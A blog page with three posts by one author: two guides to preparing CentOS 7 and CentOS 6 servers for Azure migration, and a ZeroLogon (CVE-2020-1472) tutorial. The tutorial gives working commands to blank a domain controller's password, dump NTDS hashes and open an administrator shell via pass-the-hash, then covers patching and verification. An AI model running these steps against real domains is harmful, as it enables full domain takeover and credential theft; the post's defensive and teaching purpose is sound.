How to prepare your CentOS 7 machine to Microsoft Azure

This guide will help you prepare your CentOS 7 server for a migration from on-premise to Microsoft Azure cloud. It can be a bit tricky to get everything to work correctly and personally I didn’t find Microsofts guides to be great so I write this post to help you with the steps that is needed to migrate your old CentOS 7 machine to the cloud.

What you need to configure

  • Install Azure Linux Agent
  • Network Configuration
  • Hyper-V Drivers Configuration
  • Serial Console Configuration

How to do it

Install Azure Linux Agent

Install the Azure Linux Agent with yum.
yum install WaLinuxAgent

Network Configuration

The network interface needs to be configured to use DHCP and you need to add the hyper-v drivers to the interface. You can either do it by configuring your existing networki interface (eth0) or create a new one:

1. Create a configuration file for the interface
vim /etc/sysconfig/network-scripts/ifcfg-eth0

NAME="eth0"
DEVICE="eth0"
BOOTPROTO=dhcp
ONBOOT=yes


Save the file with :wq

2. Map the networking card to the Hyper-V drivers by appending the following line to the 70-persistent-net.rules file.

vim /etc/udev/rules.d/70-persistent-net.rules

#For Azure
SUBSYSTEM=="net", ACTION=="add", DRIVERS=="hv_netvsc", ATTR{type}=="1", KERNEL=="eth*", NAME="eth0"

Save the file with :wq

Hyper-V Drivers Configuration

  1. Add Hyper-V drivers to Dracut
    vim /etc/dracut.conf
    add_drivers+=" hv_vmbus hv_netvsc hv_storvsc nvme ena xen_blkfront xen_netfront mptbase mptscsih mptspi "
  2. Update Initramfs by running the following command:
    dracut --force -v
  3. Verify that the Hyper-V modules have been loaded
    lsinitrd | grep hv

Serial Console Configuration

Azure uses ttyS0 for serial connection so we need to add it to our configuration.

  1. First add ttyS0 to secureetty by appending the following
    vim /etc/secureetty
    #add
    ttyS0

  2. Configure grub
    vim /etc/default/grub
    #Add
    GRUB_CMDLINE_LINUX="rootdelay=300 console=ttyS0 earlyprintk=ttyS0"

    After saving the file run the following command
    grub2-mkconfig -o /boot/grub2/grub.cfg
  3. Activate serial service
    Copy, link and activate the serial-getty service for ttys0.

    Copy:
    cp /usr/lib/systemd/system/serial-getty@.service /etc/systemd/system/serial-getty@ttyS0.service

    Create a symlink:
    ln -s /etc/systemd/system/serial-getty@ttyS0.service /etc/systemd/system/getty.target.wants/

    Reload the daemon, then start and enable the service:
    systemctl daemon-reload
    systemctl start serial-getty@ttyS0.service
    systemctl enable serial-getty@ttyS0.service

Now you are ready for a migration to Microsoft Azure. I hope you found this guide helpful and that you will succeed with your cloud transformation.

Note: If you are running CentOS 6 I also have a guide for preparing your server for Azure.

// Rickard Carlsson

How to prepare your CentOS 6 machine to Microsoft Azure

CentOS 6 to Azure

This guide will help you prepare your CentOS 6 server for a migration from on-premise to Microsoft Azure cloud. It can be a bit tricky to get everything to work correctly and personally I didn’t find Microsofts guides to be great so I write this post to help you with the steps that is needed to migrate your old CentOS 6 machine to the cloud.

What you need to configure

  • Install Azure Linux Agent
  • Network Configuration
  • Hyper-V Drivers Configuration
  • Serial Console Configuration

How to do it

Install Azure Linux Agent

Note: You will probably need to fix mirror configuration since CentOS 6 is EOL. Instructions can be found on the following link.

  • Alternative 1
    yum install WaLinuxAgent
  • Alternative 2
    cd /tmp
    wget http://olcentgbl.trafficmanager.net/openlogic/6/openlogic/x86_64/RPMS/WALinuxAgent-2.2.45-1.el6.noarch.rpm
    yum localinstall WALinuxAgent-2.2.45-1.el6.noarch.rpm

Network Configuration

The network interface needs to be configured to use DHCP and you need to add the hyper-v drivers to the interface. You can either do it by configuring your existing networki interface (eth0) or create a new one:

1. Create a configuration file for the interface
vim /etc/sysconfig/network-scripts/ifcfg-eth0

NAME="eth0"
DEVICE="eth0"
BOOTPROTO=dhcp
ONBOOT=yes


Save the file with :wq

2. Map the networking card to the Hyper-V drivers by appending the following line to the 70-persistent-net.rules file.

vim /etc/udev/rules.d/70-persistent-net.rules

#For Azure
SUBSYSTEM=="net", ACTION=="add", DRIVERS=="hv_netvsc", ATTR{type}=="1", KERNEL=="eth*", NAME="eth0"

Save the file with :wq

Hyper-V Drivers Configuration

  1. Add Hyper-V drivers to Dracut

    vim /etc/dracut.conf

    add_drivers+=" hv_vmbus hv_netvsc hv_storvsc nvme ena xen_blkfront xen_netfront mptbase mptscsih mptspi "

  2. Update Initramfs by running the following command:

    dracut --force -v
  3. Verify that the Hyper-V modules have been loaded

    lsinitrd | grep hv

Serial Console Configuration

Azure uses ttyS0 for serial connection so we need to add it to our configuration.

  1. First add ttyS0 to secureetty by appending the following

    vim /etc/secureetty
    #add
    ttyS0

  2. Configure grub

    vim /boot/grub/grub.conf

    #add below configuration to kernel
    rootdelay=300 console=ttyS0 earlyprintk=ttyS0

    #also remove
    rhgb quiet crashkernel=auto
  3. Configure sysconfig/init

    vim /etc/sysconfig/init

    #Edit ACTIVE_CONSOLES to look like (make sure to use “”):
    ACTIVE_CONSOLES="/dev/tty[1-6] /dev/ttyS0"

    Also make sure to configure:
    timeout=15
    serial --unit=0 --speed=115200
    terminal --timeout=5 serial console

Now you are ready for a migration to Microsoft Azure. I hope you found this guide helpful and that you will succeed with your cloud transformation.

Note: If you are running CentOS 7 I also have a guide for preparing your server for Azure.

// Rickard Carlsson

ZeroLogon – How to Exploit and Mitigate

Information about vulnerability

The vulnerability I will discuss in this post it the famous ZeroLogon vulnerability(CVE-2020-1472). By exploiting the vulnerability any attacker with network access to domain controller can take complete control of a windows domain very quick and easy.

I will start off by showing you how easy you can exploit the vulnerability. Then I will continue by showing you how you can protect your domain controllers and finally I will show you how you can verify that your domain controllers have the correct fixes in place.

How to exploit the vulnerability

We will use the script by Risksense to exploit the vulnerability. To be able to run it you will need to have the Impacket library installed on your machine. If you don’t have it installed you can simply install it by following the steps below.

cd /opt/
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket/
pip3 install .
python3 setup.py install


We will then download the ZeroLogon script from Risksense.

cd /opt
git clone https://github.com/risksense/zerologon.git
cd zerologon/

Now it’s time to exploit. We need the name of the domain, the name of the DC and the IP address. For this example we will use the following information for this made up target:

  • Name of domain: LETMEIN
  • Name of DC: SECRET-DC
  • IP address of DC: 192.168.1.10

Run the script:

python3 set_empty_pw.py SECRET-DC 192.168.1.10

The DC should now have an empty string as its machine password. You can now use a tool of your choice to get out the info you want from the DC. You can for example use secretsdump.py that is included in the impacket library.

Dump credentials:
secretdump.py -just-dc LETMEIN/SECRET-DC\$192.168.1.10

Then press enter when prompted for password since it is supposed to be empty and voila. You should now see the user hashes from the NTDS.DIT.

Now you can easily find a Domain Admin like for example “LETMEIN\Administrator” and use another tool to create a shell. We will use another impacket tool for that, wmiexec.py. So all you need to do is to copy the hash that you got from secretdump.py.

Create shell to domain controller:
wmiexec.py LETMEIN\Administrator@192.168.1.10 -hashes *hashfromsecretdump.py*

You now have a shell on the domain controller. You own it and can do what you want.

Microsofts fix for this vulnerability

So, how can we now mitigate that a hacker exploits this in our own domain? Microsoft released information on how you can fix this. The first step is to install the patch and then set the FullSecureChannelProtection registry key to 1.

Instructions can be found on Microsofts website:
https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc

Hopefully you already installed the patches back in august and applied the reg key the same day as Microsoft sent out the information.

How to verify the fix

How can you make sure that you did everything right while applying Microsofts fixes? To test it you can use the Zerologon tester script by Secura. The script also uses Impacket library to test if the vulnerability remains.

How to install:
cd /opt
git clone https://github.com/SecuraBV/CVE-2020-1472.git
cd CVE-2020-1472
pip install -r requirements.txt


Run the script:
zerologon_tester.py SECRET-DC 192.168.1.10

That’s it, a super critical vulnerability that is extremely easy to exploit. Make sure that you always patch your stuff and do it quickly. ASAP is not enough 🙂

If you have any questions you can contact me on twitter (@tzusec).
// Rickard

Copyright © 2019